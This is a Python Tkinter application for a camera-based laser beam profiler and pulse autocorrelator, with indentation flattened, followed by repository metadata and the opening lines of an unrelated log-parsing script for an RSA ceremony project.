global beamimg,beamimg_save,barimg_save,save_img
global dark,trackingon
#ret, frame = cam.read()
#frame = cam.get_captured_image(timeout='10s', copy=True)
#frame = cam.latest_frame(copy=True)
#frame = cv2.flip(frame, 1)
if "C1284R13C" in cam_name:
frame = cam.latest_frame(copy=True)
frame = cv2.flip(frame, 1)
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
elif "C1285R12M" in cam_name:
frame = cam.latest_frame(copy=True)
frame = cv2.flip(frame, 1)
img = frame
elif "test" in cam_name:
ret, frame = cam.read()
frame = cv2.flip(frame, 1)
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
img_norm = CV2.beam_normalize(img)
X, Y = CV2.beam_row_columns(img, img_norm)
if trackingon == 1:
trackingimg, X, Y = CV2.tracking(img_norm)
img_norm = trackingimg
img_beamintensity = img_norm * 255
img_beamintensity = np.array(img_beamintensity, dtype="uint8")
img_beamintensity = CV2.beam_intensity_img(img_beamintensity, X, 0)
img_beamintensity = CV2.beam_intensity_img(img_beamintensity, Y, 1)
#img_beamintensity = cv2.putText(img_beamintensity, "100", (10,500), color=0, fontFace= cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, thickness=2)
beamimg_save,beamimg = CV2.beam_color(img_beamintensity)
#beamimg_save,_ = CV2.beam_color(save_img)
beam_img = cv2.resize(beamimg,(width,height))
barimg_save,bar_img = GUI.colorbar()
beam_img = cv2.hconcat([beam_img,bar_img])
beam_img = Image.fromarray(beam_img)
beam_img_tk = ImageTk.PhotoImage(image=beam_img, master=imgcanvas)
imgcap.beam_img_tk = beam_img_tk
beam_img = imgcap.configure(image=beam_img_tk)
imgcap.after(100, GUI.beamprofiler_img)
def plotter():
global fig1,fig2
global ax1,ax2
global canvas1,canvas2
global X,Y
global realsize_X, realsize_Y
ax1.cla()
ax2.cla()
state = var.get()
if state == 0:
ax1.plot(X.index.values, X.values)
ax1.set_xlabel("Beam width (px)")
ax1.set_xlim(0,cam_res_w)
ax1.set_xticks(np.arange(0,cam_res_w+1,100))
elif state == 1:
realsize_X = CV2.pixel_to_realsize(X, "mm")
ax1.plot(realsize_X, X.values)
ax1.set_xlabel("Beam width (mm)")
ax1.set_xlim(0,realsize_X[cam_res_w-1])
#ax1.set_xticks(np.arange(0,realsize_X[cam_res_h-1]+1,100))
elif state == 2:
realsize_X = CV2.pixel_to_realsize(X, "um")
ax1.plot(realsize_X, X.values)
ax1.set_xlabel("Beam width (um)")
ax1.set_xlim(0,realsize_X[cam_res_w-1])
ax1.set_ylabel("Intensity (arb.units)")
ax1.set_ylim(0,1.2)
ax1.set_yticks(np.arange(0,1.2+0.2,0.2))
YY = Y.iloc[::-1]
if state == 0:
ax2.plot(YY.values, Y.index.values)
ax2.set_ylabel("Beam width (px)",labelpad=None)
ax2.set_ylim(0,cam_res_h)
ax2.set_yticks(np.arange(0,cam_res_h+1,100))
elif state == 1:
realsize_Y = CV2.pixel_to_realsize(YY, "mm")
realsize_Y.reverse()
ax2.plot(YY.values, realsize_Y)
ax2.set_ylabel("Beam width (mm)",labelpad=None)
ax2.set_ylim(0,realsize_Y[cam_res_h-1])
#ax2.set_yticks(np.arange(0,realsize_Y[cam_res_h-1]+1,100))
elif state == 2:
realsize_Y = CV2.pixel_to_realsize(YY, "um")
realsize_Y.reverse()
ax2.plot(YY.values, realsize_Y)
ax2.set_ylabel("Beam width (um)",labelpad=None)
ax2.set_ylim(0,realsize_Y[cam_res_h-1])
ax2.set_xlabel("Intensity (arb.units)",labelpad=None)
ax2.set_xlim(0,1.2)
ax2.set_xticks(np.arange(0,1.2+0.2,0.2))
canvas1.draw()
canvas2.draw()
root.after(100, GUI.plotter)
def beam_width():
global X_peak_position, Y_peak_position
global X_size_e2,Y_size_e2
global X_size_FWHM,Y_size_FWHM
global X_knife_edge_10_90,Y_knife_edge_10_90
global X_knife_edge_20_80,Y_knife_edge_20_80
global knifeedge_count
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
try:
X_size_e2_px = CV2.beam_size(X, X_peak, 1/np.exp(2))
Y_size_e2_px = CV2.beam_size(Y, Y_peak, 1/np.exp(2))
X_size_FWHM_px = CV2.beam_size(X, X_peak, 0.5)
Y_size_FWHM_px = CV2.beam_size(Y, Y_peak, 0.5)
except:
pass
state = var.get()
if state == 0:
Static2.configure(text='13.5% of peak (px)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (px)', font=("",10,"bold"))
Static4.configure(text='Peak position (px)', font=("",10,"bold"))
X_size_e2 = X_size_e2_px
Y_size_e2 = Y_size_e2_px
X_size_FWHM = X_size_FWHM_px
Y_size_FWHM = Y_size_FWHM_px
X_peak_position = X_peak
Y_peak_position = Y_peak
elif state == 1:
Static2.configure(text='13.5% of peak (mm)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (mm)', font=("",10,"bold"))
Static4.configure(text='Peak position (mm)', font=("",10,"bold"))
X_size_e2 = CV2.from_pixel_to_beam_width(X_size_e2_px, "mm")
Y_size_e2 = CV2.from_pixel_to_beam_width(Y_size_e2_px, "mm")
X_size_FWHM = CV2.from_pixel_to_beam_width(X_size_FWHM_px, "mm")
Y_size_FWHM = CV2.from_pixel_to_beam_width(Y_size_FWHM_px, "mm")
X_peak_position = CV2.from_pixel_to_beam_width(X_peak, "mm")
Y_peak_position = CV2.from_pixel_to_beam_width(Y_peak, "mm")
elif state == 2:
Static2.configure(text='13.5% of peak (um)', font=("",10,"bold"))
Static3.configure(text='50.0% of peak (um)', font=("",10,"bold"))
Static4.configure(text='Peak position (um)', font=("",10,"bold"))
X_size_e2 = CV2.from_pixel_to_beam_width(X_size_e2_px, "um")
Y_size_e2 = CV2.from_pixel_to_beam_width(Y_size_e2_px, "um")
X_size_FWHM = CV2.from_pixel_to_beam_width(X_size_FWHM_px, "um")
Y_size_FWHM = CV2.from_pixel_to_beam_width(Y_size_FWHM_px, "um")
X_peak_position = CV2.from_pixel_to_beam_width(X_peak, "um")
Y_peak_position = CV2.from_pixel_to_beam_width(Y_peak, "um")
else:
pass
Static21.configure(text=X_size_e2, font=("",10,"bold"))
Static22.configure(text=Y_size_e2, font=("",10,"bold"))
Static31.configure(text=X_size_FWHM, font=("",10,"bold"))
Static32.configure(text=Y_size_FWHM, font=("",10,"bold"))
Static41.configure(text=X_peak_position, font=("",10,"bold"))
Static42.configure(text=Y_peak_position, font=("",10,"bold"))
#knifeedge_count = knifeedge_count + 1
#if knifeedge_count == 2:
#X_knife_edge_10_90 = CV2.knife_edge(img, 0, 0.1, 0.9)
#Y_knife_edge_10_90 = CV2.knife_edge(img, 1, 0.1, 0.9)
#X_knife_edge_20_80 = CV2.knife_edge(img, 0, 0.2, 0.8)
#Y_knife_edge_20_80 = CV2.knife_edge(img, 1, 0.2, 0.8)
#Static41.configure(text=X_knife_edge_10_90, font=("",10,"bold"))
#Static42.configure(text=Y_knife_edge_10_90, font=("",10,"bold"))
#Static51.configure(text=X_knife_edge_20_80, font=("",10,"bold"))
#Static52.configure(text=Y_knife_edge_20_80, font=("",10,"bold"))
#knifeedge_count = 0
#if autocorrelator_ == 1:
#pix2 = X_peak
#Static_a21.configure(text=pix2)
root.after(100, GUI.beam_width)
def colorbar():
num = np.linspace(255,0,256,dtype="uint8")
num = np.tile(num,(25,1))
barimg_bgr,barimg_rbg = CV2.beam_color(num.T)
#bar_img = cv2.resize(bar_img, dsize=None, fx=1, fy=1.5)
barimg_bgr = cv2.resize(barimg_bgr, dsize=(40, cam_res_h))
barimg_rbg = cv2.resize(barimg_rbg, dsize=(25, height))
#bar_img = Image.fromarray(bar_img)
#bar_img_tk = ImageTk.PhotoImage(image=bar_img, master=barcanvas)
#barimg.bar_img_tk = bar_img_tk
#barimg = barimg.configure(image=bar_img_tk)
return barimg_bgr, barimg_rbg
def dark():
global dark,dark_data
dark = 1
#dark_data = img
def dark_offset():
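        # Background subtraction: after the Offset button sets dark = 1, the
        # next 20 frames are averaged into dark_data; once dark reaches 21,
        # beam_normalize subtracts this average from every frame.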
global dark_data, dark
if dark == 1:
#tkmsg.showinfo("Info", "Please wait a moment")
GUI.waitdialog("Wait a moment")
dark_data = img
dark = dark + 1
elif 2 <= dark < 20:
dark_data = np.dstack([dark_data, img])
dark = dark + 1
elif dark == 20:
dark_data = np.dstack([dark_data, img])
dark_data = dark_data.mean(axis=2)
dark = dark + 1
try:
msgdialog.destroy()
except:
pass
else:
pass
def waitdialog(message):
global msgdialog
msgdialog = tk.Toplevel(root)
msgdialog.transient()
msgdialog.title('Info')
tk.Label(msgdialog, text=message, font=("",20,"bold")).grid(padx=20, pady=20)
return msgdialog
def exposure_time():
global exposuretime
exposuretime = exposuretimebox.get()
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
cam.stop_live_video()
cam.start_live_video(framerate=None, exposure_time="%s ms" % exposuretime)
time.sleep(0.5)
elif "test" in cam_name:
cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, 0.25)
cam.set(cv2.CAP_PROP_EXPOSURE,float(exposuretime))
time.sleep(0.5)
def trigger():
cam.stop_live_video()
#cam.set_trigger(mode='hardware', edge='rising')
cam.blacklevel_offset
cam.start_live_video(framerate=None)
time.sleep(0.5)
def tracking_button():
global trackingon
if trackingon == 0:
trackingon = 1
elif trackingon == 1:
trackingon = 0
def hsliderbutton():
if varh.get() == True:
horizontalslider.set(numcolumn)
def vsliderbutton():
if varv.get() == True:
verticalslider.set(cam_res_h-1-numrow)
def fittingfunc(x,mu,sigma):
if func == "gaussian":
return np.exp(-(x-mu)**2 / (2.0*sigma**2))
elif func == "lorentz":
return sigma**2/(4*(x-mu)**2+sigma**2)
def scipy_fit(xdata,ydata):
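        # Fit the selected model (Gaussian or Lorentzian, per the module-level
        # `func`) to the profile with scipy.optimize.curve_fit; returns the
        # fitted (mu, sigma).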
X = np.ravel(xdata)
Y = np.ravel(ydata)
def fittingfunc(x,mu,sigma):
if func == "gaussian":
return np.exp(-(x-mu)**2 / (2.0*sigma**2))
elif func == "lorentz":
return sigma**2/(4*(x-mu)**2+sigma**2)
params,cov = scipy.optimize.curve_fit(fittingfunc,X,Y)
return params
def autocorrelator_graph():
global fig3,fig4
global ax3,ax4
fig3 = Figure(figsize=(6, 3), dpi=70)
fig3.subplots_adjust(bottom=0.2)
ax3 = fig3.add_subplot(111)
ax3.set_xlabel("Beam width (px)")
ax3.set_ylabel("Intensity (arb.units)")
ax3.set_xlim(0,cam_res_w)
ax3.set_ylim(0,1.2)
ax3.set_xticks(np.arange(0,cam_res_w+1,100))
ax3.set_yticks(np.arange(0,1.2+0.2,0.2))
fig4 = Figure(figsize=(6, 3), dpi=70)
fig4.subplots_adjust(bottom=0.2)
ax4 = fig4.add_subplot(111)
ax4.set_xlabel("Time (s)")
ax4.set_ylabel("Intensity (arb.units)")
#ax4.set_xlim(0,1280)
#ax4.set_ylim(0,1.2)
#ax4.set_xticks(np.arange(0,1280+1,100))
#ax4.set_yticks(np.arange(0,1.2+0.2,0.2))
def calculate():
global pix1, pix2, pix, X_gaussian
global acdata1, acdata2
pix1 = 0
if pix1 == False:
ax3.cla()
ax3.plot(X.index.values, X.values)
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
if pix1 == False:
#pix1 = X_peak
pix = X.index.values
X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
params = GUI.scipy_fit(X_data.index.values, X_data.values)
X_gaussian = GUI.fittingfunc(X_data.index.values, params[0], params[1])
X_gaussian = pd.Series(X_gaussian)
try:
acdata1
        except NameError:  # first run: acdata1 not created yet
acdata1 = []
acdata2 = beamimg_save
acdata1 = pd.DataFrame({"Normalized(original)":pd.Series(X), "Fitting(original)":X_gaussian})
pix1 = CV2.beam_peak(X_gaussian)
#pix1_peak = X_gaussian.max
#pix1_size = CV2.beam_size_(X_gaussian, pix1_peak, 1/2**0.5)
ax3.plot(X.index.values, X_gaussian.values)
ax3.set_xlabel("Beam width (px)")
ax3.set_ylabel("Intensity (arb.units)")
ax3.set_xlim(0,cam_res_w)
ax3.set_ylim(0,1.2)
ax3.set_xticks(np.arange(0,cam_res_w+1,200))
ax3.set_yticks(np.arange(0,1.2+0.2,0.2))
canvas3 = FigureCanvasTkAgg(fig3, master=frame2)
canvas3.get_tk_widget().grid(row=2, column=1)
canvas3._tkcanvas.grid(row=2, column=1)
canvas3.draw()
#X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
#params = GUI.scipy_fit(X_data.index.values, X_data.values)
#X_gaussian_2 = GUI.gaussian_fit(X_data.index.values, params[0], params[1])
#X_gaussian_2 = pd.Series(X_gaussian_2)
#pix2 = CV2.beam_peak(X_gaussian_2)
#acdata3 = pd.DataFrame({"Normalized(Second)":pd.Series(X), "Fitting(Second)":X_gaussian_2})
#acdata1 = pd.concat([acdata1,acdata3], axis=1)
#pix2_peak = X_gaussian_2.max
#pix2 = CV2.beam_size_(X_gaussian_2, pix2, 1/2**0.5)
#time.sleep(0.5)
def autocorrelator():
global t,FWHM_t
global autocorrelator_,pix2
global acdata1, acdata4
X_peak = CV2.beam_peak(X)
Y_peak = CV2.beam_peak(Y)
X_data, Y_data = CV2.beam_intensity(X, Y, X_peak, Y_peak)
params = GUI.scipy_fit(X_data.index.values, X_data.values)
X_gaussian_2 = GUI.fittingfunc(X_data.index.values, params[0], params[1])
X_gaussian_2 = pd.Series(X_gaussian_2)
pix2 = CV2.beam_peak(X_gaussian_2)
acdata3 = pd.DataFrame({"Normalized(Second)":pd.Series(X), "Fitting(Second)":X_gaussian_2})
acdata1 = pd.concat([acdata1,acdata3], axis=1)
acdata4 = beamimg_save
dpix = abs(pix1-pix2)
dx = dxbox.get()
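        # Time calibration: dpix is the fitted peak shift in pixels between
        # the base and second traces, dx the stage displacement in mm (hence
        # the 1e-3). The factor 2 in the Gaussian branch reflects the doubled
        # optical path of the moving delay arm; the 1/sqrt(2) in the Lorentz
        # branch appears to fold in its deconvolution factor. `data` is the
        # resulting seconds-per-pixel scale.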
if func == "gaussian":
data = 2*float(dx)*10**(-3)/(299792458*dpix)
elif func == "lorentz":
data = 1/np.sqrt(2)*float(dx)*10**(-3)/(299792458*dpix)
t = pix*data
ax4.cla()
ax4.plot(t, X_gaussian)
ax4.set_xlabel("Time (s)")
ax4.set_ylabel("Intensity (arb.units)")
#ax4.set_xlim(0,1280)
ax4.set_ylim(0,1.2)
#ax4.set_xticks(np.arange(0,1280+1,200))
ax4.set_yticks(np.arange(0,1.2+0.2,0.2))
canvas4 = FigureCanvasTkAgg(fig4, master=frame2)
canvas4.get_tk_widget().grid(row=3, column=1)
canvas4._tkcanvas.grid(row=3, column=1)
X_gaussian_ = pd.Series(X_gaussian)
FWHM = CV2.beam_size(X_gaussian_,pix1,1/2**0.5)
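        # The 1/sqrt(2) level used above yields FWHM/sqrt(2) for a Gaussian,
        # which compensates the sqrt(2) broadening of an intensity
        # autocorrelation trace relative to the pulse itself.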
FWHM_t = FWHM * data * 10**15
FWHM_t = round(FWHM_t, 1)
Static_a11.configure(text="%s fs" % FWHM_t, font=("",80,"bold"))
FWHM_t = pd.DataFrame([FWHM_t], columns=["Pulse duration (fs)"])
acdata1 = pd.concat([acdata1,FWHM_t], axis=1)
autocorrelator_ = 1
class GUI_menu:
def mainmenu():
mainmenu = tk.Menu(root)
root.config(menu=mainmenu)
filemenu = tk.Menu(mainmenu, tearoff=0)
mainmenu.add_cascade(label="File", menu=filemenu)
filemenu.add_command(label="Save as", command=GUI_menu.savefile)
filemenu.add_command(label="Quit", command=GUI_menu.menu_quit)
#filemenu.add_separator()
toolsmenu = tk.Menu(mainmenu, tearoff=0)
#settingsmenu = tk.Menu(toolsmenu, tearoff=0)
cam_select = tk.Menu(toolsmenu, tearoff=0)
fittingfunction = tk.Menu(toolsmenu, tearoff=0)
mainmenu.add_cascade(label="Tools", menu=toolsmenu)
toolsmenu.add_command(label="Settings", command=GUI_menu.settings)
toolsmenu.add_cascade(label="Camera select", menu=cam_select)
cam_list = GUI.cam_select()
for i in cam_list:
            cam_select.add_command(label="%d" % i, command=lambda i=i: GUI_menu.switch_cam(i))  # bind i now, call only on click
toolsmenu.add_cascade(label="Fitting function", menu=fittingfunction)
fittingfunction.add_command(label="gaussian", command=GUI_menu.set_gaussian)
fittingfunction.add_command(label="lorentz", command=GUI_menu.set_lorentz)
#settingsmenu.add_command(label="Exposure time", command=GUI.exposure_time)
autocorrelatormenu = tk.Menu(mainmenu, tearoff=0)
mainmenu.add_cascade(label="Autocorrelator", menu=autocorrelatormenu)
def settings():
global settingsframe
settingswindow = tk.Toplevel()
settingswindow.title("Settings")
settingswindow.geometry("500x300")
settingswindow.resizable(0,0)
#settingswindow.overrideredirect(True)
settingswindow.grid()
settingsframe = ttk.Notebook(settingswindow, width=500, height=275)
settingsframe.grid(row=1, column=1, columnspan = 3)
t1,t2,t3,t4,t5 = GUI_menu.createtab()
GUI_menu.tab_camera(t1)
GUI_menu.tab_graph(t2)
GUI_menu.tab_capture(t3)
GUI_menu.tab_savefile(t5)
def createtab():
t1 = tk.Canvas(settingsframe)
t2 = tk.Canvas(settingsframe)
t3 = tk.Canvas(settingsframe)
t4 = tk.Canvas(settingsframe)
t5 = tk.Canvas(settingsframe)
settingsframe.add(t1, text="Camera")
settingsframe.add(t2, text="Graph")
settingsframe.add(t3, text="Capture")
settingsframe.add(t4, text="Autocorrelator")
settingsframe.add(t5, text="File")
return t1, t2, t3, t4, t5
def tab_camera(t1):
global exposuretime, exposuretimebox, cam_res_box
t1frame1 = ttk.Frame(t1, width=500, height=100)
t1frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
t1frame2 = ttk.Frame(t1, width=500, height=100)
t1frame2.grid(row=2, column=1, sticky="nw", padx=30, pady=30)
cam_res_label = ttk.LabelFrame(t1frame1, text="Camera resolution", width=450, height=100)
cam_res_label.grid(row=1, column=1, sticky="w")
#cam_res_list = ["3264x2448", "2592x1944", "2048x1536", "1600x1200", "1280x960", "1024x768", "800x600", "640x480", "320x240"]
cam_res_list = ["1600x1200", "1280x960", "1024x768", "800x600", "640x480", "320x240"]
cam_res_list.reverse()
cam_res_box = ttk.Combobox(cam_res_label, values=cam_res_list, state="readonly")
cam_res_box.grid(row=2, column=1, padx=30, pady=10, sticky="w")
cam_res_box.set("%s" % cam_res)
cam_res_button = ttk.Button(cam_res_label, text="Set", command=GUI_menu.set_cam_res, style="style.TButton")
cam_res_button.grid(row=2, column=2, padx=10, pady=10, sticky="w")
exposuretimelabel = ttk.LabelFrame(t1frame2, text="Exposuretime", width=450, height=100)
exposuretimelabel.grid(row=1, column=1, sticky="w")
darkbutton = ttk.Button(exposuretimelabel, text="Offset", command=GUI.dark, style="style.TButton")
darkbutton.grid(row=2, column=3, padx=10)
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
exposuretimebox = ttk.Spinbox(exposuretimelabel, from_=0.1, to=100, increment=0.1)
exposuretimebox.set("%s" % exposuretime)
elif "test" in cam_name:
#exposuretimelist = ["640 ms", "320 ms", "160 ms", "80 ms", "40 ms", "20 ms", "10 ms", "5 ms", "2.5 ms", "1.25 us", "650 um", "312 um", "150 um"]
#exposuretimebox = ttk.Spinbox(t1frame2, value=exposuretimelist, state="readonly")
exposuretimebox = ttk.Spinbox(exposuretimelabel, from_=-13, to=-1, increment=1)
exposuretimebox.set("%s" % exposuretime)
exposuretimebox.grid(row=2, column=1, pady=10, sticky="w")
exposuretimebutton = ttk.Button(exposuretimelabel, text="Set", command=GUI.exposure_time, style="style.TButton")
exposuretimebutton.grid(row=2, column=2, padx=10, pady=10, sticky="w")
def tab_graph(t2):
t2frame1 = ttk.Frame(t2, width=500, height=100)
t2frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
axislabel = ttk.LabelFrame(t2frame1, text="Axis setting", width=450, height=100)
axislabel.grid(row=1, column=1, sticky="w")
        # Pass the callback itself (no parentheses): calling it here would
        # bind `command` to its return value instead of a function.
        pixelbutton = ttk.Radiobutton(axislabel, text="Pixel", variable=var, value=0, command=GUI_menu.set_actualsize)
        pixelbutton.grid(row=2, column=1, sticky="w")
        actualsizebuttonmm = ttk.Radiobutton(axislabel, text="Actual size (mm)", variable=var, value=1, command=GUI_menu.set_actualsize)
        actualsizebuttonmm.grid(row=3, column=1, sticky="w")
        actualsizebuttonum = ttk.Radiobutton(axislabel, text="Actual size (um)", variable=var, value=2, command=GUI_menu.set_actualsize)
        actualsizebuttonum.grid(row=4, column=1, sticky="w")
def tab_capture(t3):
global varv, varh
t3frame1 = ttk.Frame(t3, width=500, height=100)
t3frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
trackingbutton = ttk.Button(t3frame1, text="Tracking", command=GUI.tracking_button, style="style.TButton")
trackingbutton.grid(row=1, column=2, rowspan=2, padx=20)
style = ttk.Style()
style.configure("style.TCheckbutton", font=("",10,"bold"))
varv = tk.BooleanVar()
verticalsliderbutton = ttk.Checkbutton(t3frame1, text="Horizontal slider", variable=varv, command=GUI.vsliderbutton, style="style.TCheckbutton")
verticalsliderbutton.grid(row=2, column=1, sticky="w")
varh = tk.BooleanVar()
horizontalsliderbutton = ttk.Checkbutton(t3frame1, text="Vertical slider", variable=varh, command=GUI.hsliderbutton, style="style.TCheckbutton")
horizontalsliderbutton.grid(row=1, column=1, sticky="w")
def tab_savefile(t5):
global varraw, varnormal, varimg, vargray, varbar, varintensity
global var_list_get
t5frame1 = ttk.Frame(t5, width=500, height=100)
t5frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
savefilelabel = ttk.LabelFrame(t5frame1, text="Save file", width=450, height=100)
savefilelabel.grid(row=1, column=1, sticky="w")
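        # Create the checkbox variables only on the first open; on later
        # opens var_list_get already exists and the saved states are reused.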
try:
var_list_get
except:
varraw = tk.BooleanVar()
varnormal = tk.BooleanVar()
varimg = tk.BooleanVar()
vargray = tk.BooleanVar()
varbar = tk.BooleanVar()
varintensity = tk.BooleanVar()
var_list_get = [True,False,True,False,True,False]
var_list = [varraw, varnormal, varimg, vargray, varbar, varintensity]
for i,j in zip(var_list_get, var_list):
j.set(i)
GUI_menu.get_var()
rawbutton = ttk.Checkbutton(savefilelabel, text="RAW data", command=GUI_menu.get_var, variable=varraw, style="style.TCheckbutton")
rawbutton.grid(row=2, column=1, sticky="w")
normalbutton = ttk.Checkbutton(savefilelabel, text="Normalized data", command=GUI_menu.get_var, variable=varnormal, style="style.TCheckbutton")
normalbutton.grid(row=3, column=1, sticky="w")
imgbutton = ttk.Checkbutton(savefilelabel, text="Color image", command=GUI_menu.get_var, variable=varimg, style="style.TCheckbutton")
imgbutton.grid(row=4, column=1, sticky="w")
graybutton = ttk.Checkbutton(savefilelabel, text="Black-and-white image", command=GUI_menu.get_var, variable=vargray, style="style.TCheckbutton")
graybutton.grid(row=5, column=1, sticky="w")
barbutton = ttk.Checkbutton(savefilelabel, text="with color bar", command=GUI_menu.get_var, variable=varbar, style="style.TCheckbutton")
barbutton.grid(row=2, column=2, sticky="w")
intensitybutton = ttk.Checkbutton(savefilelabel, text="with intensity plot", command=GUI_menu.get_var, variable=varintensity, style="style.TCheckbutton")
intensitybutton.grid(row=3, column=2, sticky="w")
def savefile():
global fname
        fname = tkfd.asksaveasfile(confirmoverwrite=False, defaultextension=".png", filetypes=[("PNG files",".png"),("JPG files",".jpg"),("BMP files",".bmp"),("TIFF files",".tiff")])
        if fname is None:  # user cancelled the save dialog
            return
        fnamebox.insert(tk.END, fname.name)
GUI_menu.get_var()
filename = fname.name.split(".")
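        # Save pipeline: normalize the frame, scale to 8-bit grayscale, apply
        # the false-color map, and optionally overlay the row/column intensity
        # profiles and the color bar before writing to disk.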
saveimg_norm = CV2.beam_normalize(img)
X, Y = CV2.beam_row_columns(img, saveimg_norm)
saveimg = saveimg_norm * 255
saveimg_gray = np.array(saveimg, dtype="uint8")
saveimg_color,_ = CV2.beam_color(saveimg_gray)
saveimg_intensity = CV2.beam_intensity_img(saveimg_gray, X, 0)
saveimg_intensity = CV2.beam_intensity_img(saveimg_intensity, Y, 1)
saveimg_intensity,_ = CV2.beam_color(saveimg_intensity)
if varimg.get() == True and varbar.get() == True and varintensity.get() == True:
beamimg1 = cv2.hconcat([saveimg_intensity,barimg_save])
cv2.imwrite(fname.name, beamimg1)
if varimg.get() == True and varbar.get() == True and varintensity.get() == False:
beamimg2 = cv2.hconcat([saveimg_color,barimg_save])
cv2.imwrite(fname.name, beamimg2)
if varimg.get() == True and varbar.get() == False and varintensity.get() == True:
cv2.imwrite(fname.name, saveimg_intensity)
if varimg.get() == True and varbar.get() == False and varintensity.get() == False:
cv2.imwrite(fname.name, saveimg_color)
if vargray.get() == True:
cv2.imwrite("%s_gray.%s" % (filename[0],filename[1]), saveimg_gray)
if varraw.get() == True:
np.savetxt("%s_RAW.csv" % filename[0], img, delimiter=",")
if varnormal.get() == True:
np.savetxt("%s_normalized.csv" % filename[0], img_norm, delimiter=",")
def acsavefile():
global fname
        fname = tkfd.asksaveasfile(confirmoverwrite=False, defaultextension=".png", filetypes=[("PNG files",".png"),("JPG files",".jpg"),("BMP files",".bmp"),("TIFF files",".tiff")])
        if fname is None:  # user cancelled the save dialog
            return
        fnamebox.insert(tk.END, fname.name)
txtname = fname.name.split(".")
cv2.imwrite(fname.name, acdata2)
#np.savetxt("%s.csv" % txtname[0], img, delimiter=",")
        try:
            # Single "%s" placeholder: txtname[0] is one string, so the old
            # "%s_second%s.png" format raised "not enough arguments".
            cv2.imwrite("%s_second.png" % txtname[0], acdata4)
        except:
            pass
        np.savetxt("%s.csv" % txtname[0], acdata1, delimiter=",")
def set_cam_res():
global cam_res_w, cam_res_h, cam_res
#cam.release()
cam_res = cam_res_box.get()
cam_res = cam_res.split("x")
cam_res_w = int(cam_res[0])
cam_res_h = int(cam_res[1])
cam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_res_w)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_res_h)
#ret, frame = cam.read()
time.sleep(1)
def set_actualsize():
state = var.get()
return state
    def switch_state():
        # Cycle the axis mode 0 -> 1 -> 2 -> 0 and write it back; without
        # var.set() the incremented value was computed but never stored.
        state = var.get()
        state += 1
        if state == 3:
            state = 0
        var.set(state)
def set_gaussian():
global func
func = "gaussian"
print(func)
def set_lorentz():
global func
func = "lorentz"
print(func)
def menu_quit():
cam.release()
root.destroy()
#exit()
def switch_cam(camera_id):
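        # Return a no-argument callback with camera_id bound, suitable for
        # use as a menu command (see the Camera select menu above).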
def x():
GUI.cam_setup_test(camera_id)
return x
def get_var():
global var_list_get
var_list = [varraw, varnormal, varimg, vargray, varbar, varintensity]
for i,j in zip(np.arange(0, len(var_list_get), 1), var_list):
var_list_get[i] = j.get()
class GUI_button:
def button():
buttonframe = ttk.Frame(subframe, height=200, width=300)
buttonframe.grid(row=1, column=1, sticky="nw")
trackingphoto = tk.PhotoImage(file="tracking.png")
trackingphoto = trackingphoto.subsample(5)
trackingbutton = ttk.Button(buttonframe, image=trackingphoto, command=GUI.tracking_button, style="style.TButton")
trackingbutton.image = trackingphoto
trackingbutton.grid(row=1, column=1)
darkphoto = tk.PhotoImage(file="offset.png")
darkphoto = darkphoto.subsample(5)
darkbutton = ttk.Button(buttonframe, image=darkphoto, command=GUI.dark, style="style.TButton")
darkbutton.image = darkphoto
darkbutton.grid(row=1, column=2)
axisphoto = tk.PhotoImage(file="axis_px.png")
axisphoto = axisphoto.subsample(5)
        axisbutton = ttk.Button(buttonframe, image=axisphoto, command=GUI_menu.switch_state, style="style.TButton")
axisbutton.image = axisphoto
axisbutton.grid(row=1, column=3)
if __name__ == "__main__":
#sys.modules[__name__].__dict__.clear()
GUI.cam_setup_test(0)
GUI.setup()
GUI_button.button()
#Settings_tab.createtab()
shutterspeed = 0
pix1, pix2 = 0, 0
knifeedge_count = 0
var = tk.IntVar()
var.set(0)
#GUI.cam_setup_test()
GUI_menu.mainmenu()
GUI.autocorrelator_graph()
dark, trackingon = 0, 0
#root.after(0, GUI.colorbar)
_, barimg = GUI.colorbar()
root.after(0, GUI.beamprofiler_img)
root.after(0, GUI.plotter)
root.after(0, GUI.beam_width)
#TAB.createtab(master=testcanvas)
#TAB.Autocorrelator_tab()
#TAB.buttons()
    root.mainloop()
| ["[email protected]"] | |
da6a6a82023d8bd6df509fa28f82aa169fdb69c2 | c1b31aa113c626f3cbb5264fac9e4c9cad83b8b9 | process_logs/parse.py | 033a954b0a7c783f9a7d9f2a881513fff78dfd76 | ["Apache-2.0"] | permissive | JustinDrake/LigeroRSA | cff724a5da387bd7ac9093007cb1b7897e496fca | 5d6d05788d7d4b44f0ddb01b8221f79b4851653a | refs/heads/master | 2022-09-10T08:18:03.902128 | 2020-06-01T23:32:37 | 2020-06-01T23:32:37 | 268,911,316 | 1 | 2 | NOASSERTION | 2020-06-02T21:21:15 | 2020-06-02T21:21:14 | null | UTF-8 | Python | false | false | 13,642 | py |
#!/usr/local/bin/python3.7
from os import path
from datetime import datetime
import re
import glob
from statistics import mean, stdev
### REGULAR EXPRESSIONS FOR PARSING PARTS OF LOGS
logts = re.compile('([0-9]{2}):([0-9]{2}):([0-9]{2}).([0-9]{3})')
# 21:12:23.981 โน ,1.a. Overall speed, , ,374.32 MB,374.32 MB,06:21.692612,06:21.692616,
s1a = re.compile('1\.a\. Overall speed, , ,([0-9\.]+) MB,([0-9\.]+) MB,(\d\d):(\d\d)\.(\d+)')
# 21:06:02.288 Registration completed for 2 out of 2
reg = re.compile('Registration completed')
preg = re.compile('registering with coordinator')
# 21:06:24.001 โนRSA Ceremony, , , ,304.11 MB,304.11 MB,00:21.713310,00:21.713311,
# 21:25:11.714 Found 1 valid moduli:
